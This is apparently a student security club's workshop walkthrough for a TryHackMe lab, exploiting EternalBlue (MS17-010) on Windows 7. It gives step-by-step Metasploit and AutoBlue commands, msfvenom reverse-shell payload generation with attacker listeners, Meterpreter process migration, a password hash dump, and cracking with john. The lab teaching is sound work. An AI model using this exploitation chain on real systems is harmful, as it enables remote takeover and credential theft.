NYP InfoSec Introduction to Pentesting Workshop

This workshop is hosted using a TryHackMe Lab, where we will need to exploit CVE-2017-0144 on a Windows 7 Machine

Exporting the IP as shell variable to make life easier

export ip=10.10.24.176

We are able to call $ip in the terminal when we need it instead of typing out the whole IP Address

Task 1 [Recon]

Nmap Scan

nmap -A -T4 -oN output.nmap $ip

-A: Performs OS Detection, Version Detection, Script Scanning and Traceroute

-T4: Timing Template, number between 1-5, higher is faster, but might be less accurate

-oN: Normal output

Redacted nmap output
# Nmap 7.92 scan initiated Thu Mar 10 19:57:12 2022 as: nmap -A -T4 -vv -oN nmap.out 10.10.24.176
Increasing send delay for 10.10.24.176 from 0 to 5 due to 26 out of 64 dropped probes since last increase.
Nmap scan report for 10.10.24.176
Host is up, received conn-refused (0.32s latency).
Scanned at 2022-03-10 19:57:13 +08 for 168s
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE            REASON  VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Thu Mar 10 20:00:01 2022 -- 1 IP address (1 host up) scanned in 168.71 seconds

Enumeration

Google Windows 7 Professional 7601 Service Pack 1 exploit

MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Task 2 [Gain Access]

Gaining Shell

msfconsole -q
use windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
show options

Module options to set

RHOSTS Remote Host, or our victim machines IP Address

LHOST Listen Host, or our local machine IP Address

set RHOSTS <VICTIM_IP>
set LHOST <ATTACKER_IP>

Confirm that the exploit works

exploit
whoami

Note: The exploit uses the Metasploit ms17_010_eternalblue.rb script, however that is out of scope for this workshop. The GitHub URL is attached below for reference if anyone is interested in learning more.

metasploit-framework/ms17_010_eternalblue.rb at master · rapid7/metasploit-framework

Task 3 [Escalate]

Upgrading command shell to Meterpreter

Why? Able to run Meterpreter shell command, instead of only being limited to windows command

How?

We will need to background our current session, and use the post/multi/manage/shell_to_meterpreter to convert our shell to Meterpreter Shell

Ctrl + Z to background

use post/multi/manage/shell_to_meterpreter
sessions
show options
set session <SESSION NUMBER>
exploit

Note: The module uses the Metasploit shell_to_meterpreter.rb script, which is out of scope for the workshop. The GitHub URL is attached below for reference if anyone is interested in learning more.

metasploit-framework/shell_to_meterpreter.rb at master · rapid7/metasploit-framework

Swap to Meterpreter shell after running the post module

sessions -l
sessions -i 2

sessions -l List all active sessions

sessions -i Interact with the supplied session ID, which in this case is Session ID 2

Confirm that the Meterpreter shell works and that we are

NT AUTHORITY\SYSTEM

getuid
Server username: NT AUTHORITY\\SYSTEM

Migrating Process

We are running as system but that doesn’t indicate that our process is. We need to migrate to another process which user is NT AUTHORITY\SYSTEM

hashdump (fails cause meterpreter is not system)

ps
migrate 700

Dumping Users Hash

hashdump

Task 4 [Cracking]

Identifying the type of hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Google windows 7 password hash format

Understanding Windows local password hashes (NTLM)

From the stackexchange article, we understand that it is a LM/NT hash

Cracking the hash

First, we will save the hash that we managed to dump into a file called password_hash

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt password_hash

We have managed to successfully cracked Jon password, using the rockyou.txt wordlist

To learn more about Windows LM hash, refer to this article.

You Gotta Hack That | Penetration Testing Consultancy

Why did we fail to crack Administrator and Guest Hash?

The aad3b435b51404eeaad3b435b51404ee is the Windows LM hash for “no password”.

Task 5 [Find Flags!]

search -f flag*txt

c:\\flag1.txt (24 bytes)
c:\\Users\\Jon\\Documents\\flag3.txt (37 bytes)
c:\\Windows\\System32\\config\\flag2.txt (34 bytes)

Challenge

Attempt to exploit the machine without using Metasploit!

You are all encouraged to explore different methods to hack into the box without relying on Metasploit.

Installing Requirements

git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
pip3 install -r requirements.txt

Checking if machine is vulnerable to EternalBlue

python eternal_checker.py $ip
[*] Target OS: Windows 7 Ultimate 7601 Service Pack 1
[!] The target is not patched
=== Testing named pipes ===
[*] Done

Compiling Shellcode

cd shellcode
./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.8.53.141
LPORT you want x64 to listen on:
4444
LPORT you want x86 to listen on:
5555
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (staged)...

msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.8.53.141 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 511 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (staged)...

msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.8.53.141 LPORT=5555
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 362 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

Preparing the listener (following the instructions)

cd ../
./listener_prep.sh 
  __
  /,-
  ||)
  \\_, )
   `--'
Enternal Blue Metasploit Listener

LHOST for reverse connection:
10.8.53.141
LPORT for x64 reverse connection:
4444
LPORT for x86 reverse connection:
5555
Enter 0 for meterpreter shell or 1 for regular cmd shell:
1
Type 0 if this is a staged payload or 1 if it is for a stageless payload
1
Starting listener (staged)...
Starting postgresql (via systemctl): postgresql.service.
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]

       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2048 exploits - 1105 auxiliary - 344 post       ]
+ -- --=[ 564 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use help <command> to learn more about any command

[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (config.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
PAYLOAD => windows/x64/shell/reverse_tcp
resource (config.rc)> set LHOST 10.8.53.141
LHOST => 10.8.53.141
resource (config.rc)> set LPORT 4444
LPORT => 4444
resource (config.rc)> set ExitOnSession false
ExitOnSession => false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
resource (config.rc)> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
[*] Started reverse TCP handler on 10.8.53.141:4444 
resource (config.rc)> set LPORT 5555
LPORT => 5555
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.8.53.141:5555

OR Using a netcat listener instead

nc -nvlp 4444
nc -nvlp 5555

PWN the target!

Open a new shell/new tab

python3 eternalblue_exploit7.py $ip shellcode/sc_all.bin

shellcode size: 2294
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done